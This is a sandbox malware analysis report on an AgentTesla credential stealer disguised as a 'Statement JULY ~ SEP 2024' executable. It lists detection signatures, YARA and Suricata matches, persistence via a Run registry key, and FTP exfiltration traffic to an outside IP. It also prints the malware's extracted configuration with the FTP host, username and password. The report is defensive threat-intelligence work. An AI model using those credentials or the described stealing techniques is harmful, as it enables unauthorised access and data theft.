Edit tour

Windows Analysis Report
Statement JULY #U007e SEP 2024 USD 19,055.00.exe

Overview

General Information

Sample name:	Statement JULY #U007e SEP 2024 USD 19,055.00.exe renamed because original name is a hash value
Original sample name:	Statement JULY ~ SEP 2024 USD 19,055.00.exe
Analysis ID:	1545102
MD5:	a528109e5486419098353578bd5e662a
SHA1:	597c6324eb2796a81f13d91cd12124734790210c
SHA256:	c5210dcae2936ca5424a1224ddc519bded76064115a95e58c722b69e96ac344c
Tags:	exeuser-koluke
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AgentTesla

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

AI detected suspicious sample

Connects to many ports of the same IP (likely port scanning)

Contains functionality to log keystrokes (.Net Source)

Contains functionality to register a low level keyboard hook

Drops executable to a common third party application directory

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Installs a global keyboard hook

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Creates processes with suspicious names

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Uses 32bit PE files

Uses FTP

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Statement JULY #U007e SEP 2024 USD 19,055.00.exe (PID: 7524 cmdline: "C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe" MD5: A528109E5486419098353578BD5E662A)

Statement JULY #U007e SEP 2024 USD 19,055.00.exe (PID: 7552 cmdline: "C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe" MD5: A528109E5486419098353578BD5E662A)

Statement JULY #U007e SEP 2024 USD 19,055.00.exe (PID: 7560 cmdline: "C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe" MD5: A528109E5486419098353578BD5E662A)

Statement JULY #U007e SEP 2024 USD 19,055.00.exe (PID: 7568 cmdline: "C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe" MD5: A528109E5486419098353578BD5E662A)

adobe.exe (PID: 7916 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: A528109E5486419098353578BD5E662A)

adobe.exe (PID: 7960 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: A528109E5486419098353578BD5E662A)

adobe.exe (PID: 7968 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: A528109E5486419098353578BD5E662A)

adobe.exe (PID: 7292 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: A528109E5486419098353578BD5E662A)

adobe.exe (PID: 7320 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: A528109E5486419098353578BD5E662A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://s4.serv00.com", "Username": "f2241_dol", "Password": "Doll900#@"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000003.00000002.4106544369.000000000302C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.1890171254.000000000321C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000A.00000002.4105974724.000000000345C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.1886764234.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.1886764234.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.1890171254.00000000031F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.1890171254.00000000031F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000003.00000002.4106544369.0000000003001000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.4106544369.0000000003001000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000A.00000002.4105974724.0000000003431000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.4105974724.0000000003431000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.1655541150.00000000037C9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1655541150.00000000037C9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: Statement JULY #U007e SEP 2024 USD 19,055.00.exe PID: 7524	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Statement JULY #U007e SEP 2024 USD 19,055.00.exe PID: 7524	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: Statement JULY #U007e SEP 2024 USD 19,055.00.exe PID: 7568	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Statement JULY #U007e SEP 2024 USD 19,055.00.exe PID: 7568	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: adobe.exe PID: 7968	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: adobe.exe PID: 7968	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: adobe.exe PID: 7320	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: adobe.exe PID: 7320	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 16 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
7.2.adobe.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.adobe.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.adobe.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33f62:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33fd4:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3405e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x340f0:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3415a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x341cc:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x34262:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x342f2:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.adobe.exe.400000.0.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x312ad:$s2: GetPrivateProfileString 0x30959:$s3: get_OSFullName 0x31fab:$s5: remove_Key 0x32171:$s5: remove_Key 0x33030:$s6: FtpWebRequest 0x33f44:$s7: logins 0x344b6:$s7: logins 0x37199:$s7: logins 0x37279:$s7: logins 0x38bca:$s7: logins 0x37e13:$s9: 1.85 (Hash, version 2, native byte-order)
0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.3941c80.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.3941c80.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.3941c80.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x32162:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x321d4:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3225e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x322f0:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3235a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x323cc:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x32462:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x324f2:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.3941c80.0.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x2f4ad:$s2: GetPrivateProfileString 0x2eb59:$s3: get_OSFullName 0x301ab:$s5: remove_Key 0x30371:$s5: remove_Key 0x31230:$s6: FtpWebRequest 0x32144:$s7: logins 0x326b6:$s7: logins 0x35399:$s7: logins 0x35479:$s7: logins 0x36dca:$s7: logins 0x36013:$s9: 1.85 (Hash, version 2, native byte-order)
0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.384d5b0.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.384d5b0.2.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.384d5b0.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x128632:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x163c62:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x19f082:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x1286a4:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x163cd4:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x19f0f4:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x12872e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x163d5e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x19f17e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x1287c0:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x163df0:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x19f210:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x12882a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x163e5a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x19f27a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x12889c:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x163ecc:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x19f2ec:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x128932:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x163f62:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x19f382:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.384d5b0.2.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x12597d:$s2: GetPrivateProfileString 0x160fad:$s2: GetPrivateProfileString 0x19c3cd:$s2: GetPrivateProfileString 0x125029:$s3: get_OSFullName 0x160659:$s3: get_OSFullName 0x19ba79:$s3: get_OSFullName 0x12667b:$s5: remove_Key 0x126841:$s5: remove_Key 0x161cab:$s5: remove_Key 0x161e71:$s5: remove_Key 0x19d0cb:$s5: remove_Key 0x19d291:$s5: remove_Key 0x127700:$s6: FtpWebRequest 0x162d30:$s6: FtpWebRequest 0x19e150:$s6: FtpWebRequest 0x128614:$s7: logins 0x128b86:$s7: logins 0x12b869:$s7: logins 0x12b949:$s7: logins 0x12d29a:$s7: logins 0x163c44:$s7: logins
0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.3941c80.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.3941c80.0.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.3941c80.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33f62:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x6f592:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0xaa9b2:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33fd4:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x6f604:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0xaaa24:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3405e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x6f68e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0xaaaae:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x340f0:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x6f720:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0xaab40:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3415a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x6f78a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0xaabaa:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x341cc:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x6f7fc:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0xaac1c:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x34262:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x6f892:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0xaacb2:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.3941c80.0.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x312ad:$s2: GetPrivateProfileString 0x6c8dd:$s2: GetPrivateProfileString 0xa7cfd:$s2: GetPrivateProfileString 0x30959:$s3: get_OSFullName 0x6bf89:$s3: get_OSFullName 0xa73a9:$s3: get_OSFullName 0x31fab:$s5: remove_Key 0x32171:$s5: remove_Key 0x6d5db:$s5: remove_Key 0x6d7a1:$s5: remove_Key 0xa89fb:$s5: remove_Key 0xa8bc1:$s5: remove_Key 0x33030:$s6: FtpWebRequest 0x6e660:$s6: FtpWebRequest 0xa9a80:$s6: FtpWebRequest 0x33f44:$s7: logins 0x344b6:$s7: logins 0x37199:$s7: logins 0x37279:$s7: logins 0x38bca:$s7: logins 0x6f574:$s7: logins
0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.380b580.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.380b580.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.380b580.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x16a662:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x1a5c92:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x1e10b2:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x16a6d4:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x1a5d04:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x1e1124:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x16a75e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x1a5d8e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x1e11ae:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x16a7f0:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x1a5e20:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x1e1240:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x16a85a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x1a5e8a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x1e12aa:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x16a8cc:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x1a5efc:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x1e131c:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x16a962:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x1a5f92:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x1e13b2:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.380b580.1.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x1679ad:$s2: GetPrivateProfileString 0x1a2fdd:$s2: GetPrivateProfileString 0x1de3fd:$s2: GetPrivateProfileString 0x167059:$s3: get_OSFullName 0x1a2689:$s3: get_OSFullName 0x1ddaa9:$s3: get_OSFullName 0x1686ab:$s5: remove_Key 0x168871:$s5: remove_Key 0x1a3cdb:$s5: remove_Key 0x1a3ea1:$s5: remove_Key 0x1df0fb:$s5: remove_Key 0x1df2c1:$s5: remove_Key 0x169730:$s6: FtpWebRequest 0x1a4d60:$s6: FtpWebRequest 0x1e0180:$s6: FtpWebRequest 0x16a644:$s7: logins 0x16abb6:$s7: logins 0x16d899:$s7: logins 0x16d979:$s7: logins 0x16f2ca:$s7: logins 0x1a5c74:$s7: logins
Click to see the 15 entries

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\adobe\adobe.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe, ProcessId: 7568, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\adobe

Suricata Signatures

ET MALWARE AgentTesla Exfil via FTP

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-30T05:28:58.978391+0100	2029927	1	A Network Trojan was detected	192.168.2.4	49733	213.189.52.181	21	TCP
2024-10-30T05:29:13.059573+0100	2029927	1	A Network Trojan was detected	192.168.2.4	49739	213.189.52.181	21	TCP
2024-10-30T05:29:22.514824+0100	2029927	1	A Network Trojan was detected	192.168.2.4	49748	213.189.52.181	21	TCP

ETPRO MALWARE Agent Tesla CnC Exfil Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-30T05:28:59.734351+0100	2855542	1	A Network Trojan was detected	192.168.2.4	49735	213.189.52.181	63514	TCP
2024-10-30T05:28:59.740198+0100	2855542	1	A Network Trojan was detected	192.168.2.4	49735	213.189.52.181	63514	TCP
2024-10-30T05:29:13.819998+0100	2855542	1	A Network Trojan was detected	192.168.2.4	49742	213.189.52.181	64246	TCP
2024-10-30T05:29:13.826345+0100	2855542	1	A Network Trojan was detected	192.168.2.4	49742	213.189.52.181	64246	TCP
2024-10-30T05:29:23.264162+0100	2855542	1	A Network Trojan was detected	192.168.2.4	49749	213.189.52.181	64747	TCP
2024-10-30T05:29:23.270198+0100	2855542	1	A Network Trojan was detected	192.168.2.4	49749	213.189.52.181	64747	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 7.2.adobe.exe.400000.0.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://s4.serv00.com", "Username": "f2241_dol", "Password": "Doll900#@"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe

ReversingLabs: Detection: 57%

Multi AV Scanner detection for submitted file

Source: Statement JULY #U007e SEP 2024 USD 19,055.00.exe	ReversingLabs: Detection: 57%
Source: Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Virustotal: Detection: 65%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Statement JULY #U007e SEP 2024 USD 19,055.00.exe

Joe Sandbox ML: detected

Source: Statement JULY #U007e SEP 2024 USD 19,055.00.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49747 version: TLS 1.2

Source: Statement JULY #U007e SEP 2024 USD 19,055.00.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49735 -> 213.189.52.181:63514
Source: Network traffic	Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49742 -> 213.189.52.181:64246
Source: Network traffic	Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49748 -> 213.189.52.181:21
Source: Network traffic	Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49733 -> 213.189.52.181:21
Source: Network traffic	Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49749 -> 213.189.52.181:64747
Source: Network traffic	Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49739 -> 213.189.52.181:21

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 213.189.52.181 ports 64246,63514,64747,1,2,63829,21

Source: global traffic

TCP traffic: 192.168.2.4:49735 -> 213.189.52.181:63514

Source: Joe Sandbox View	IP Address: 213.189.52.181 213.189.52.181
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152

Source: Joe Sandbox View

ASN Name: ECO-ATMAN-PLECO-ATMAN-PL ECO-ATMAN-PLECO-ATMAN-PL

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: unknown

FTP traffic detected: 213.189.52.181:21 -> 192.168.2.4:49733 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 150 allowed.220-Local time is now 06:28. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 150 allowed.220-Local time is now 06:28. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 150 allowed.220-Local time is now 06:28. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 15 minutes of inactivity.

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: s4.serv00.com

Source: adobe.exe, 00000005.00000002.1799930314.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://en.wkH
Source: Statement JULY #U007e SEP 2024 USD 19,055.00.exe, 00000003.00000002.4106544369.000000000302C000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000007.00000002.1890171254.000000000321C000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 0000000A.00000002.4105974724.000000000345C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s4.serv00.com
Source: Statement JULY #U007e SEP 2024 USD 19,055.00.exe, 00000003.00000002.4106544369.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000007.00000002.1890171254.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 0000000A.00000002.4105974724.00000000033EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: adobe.exe, 00000005.00000002.1801839278.0000000007592000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
